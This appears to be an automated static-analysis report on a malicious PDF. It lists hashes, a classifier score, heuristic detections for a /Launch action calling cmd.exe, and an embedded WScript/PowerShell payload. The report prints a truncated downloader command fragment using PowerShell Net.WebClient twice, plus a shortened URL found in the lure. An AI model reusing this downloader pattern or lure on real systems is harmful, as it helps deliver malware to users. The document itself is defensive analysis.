Malicious PDF — malware analysis report

Static analysis result for SHA-256 c2ecff0bda6a5e78…

MALICIOUS

PDF

1.6 KB First seen: 2026-06-21
MD5: 8cb34730635dc7390a209c66ead71308 SHA-1: 84ffcac2747df79e8633e51bc0393b05b43981f6 SHA-256: c2ecff0bda6a5e788ea5f57feb51adad4ede813ff4170c04fcab09d7f8084b7b
332 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9968

Heuristics 8

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • OpenAction trigger high PDF_OPENACTION
    PDF has an /OpenAction that launches, submits, or opens an external target
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • PDF JavaScript embeds a Windows Script Host payload high PDF_JS_WSCRIPT_PAYLOAD
    PDF JavaScript contains a Windows Script Host/JScript payload using WScript.CreateObject and WScript.Shell with environment, run/exec, registry, sleep, or downloader-adjacent behavior. This is suspicious payload delivery but is not attributed to a specific Acrobat CVE unless a parser/API trigger is also found.
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://tinyurl.com/3unw99cy In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_script_0000016a.bin pdf-embedded-script PDF decompressed stream script payload at offset 0x16A 66 bytes
SHA-256: 1838e3b06a1789712530f7229448c15cd27990882b50f5a343b5824148e54dbc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script
/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient

Open this report in the interactive analyzer, or submit your own file for analysis.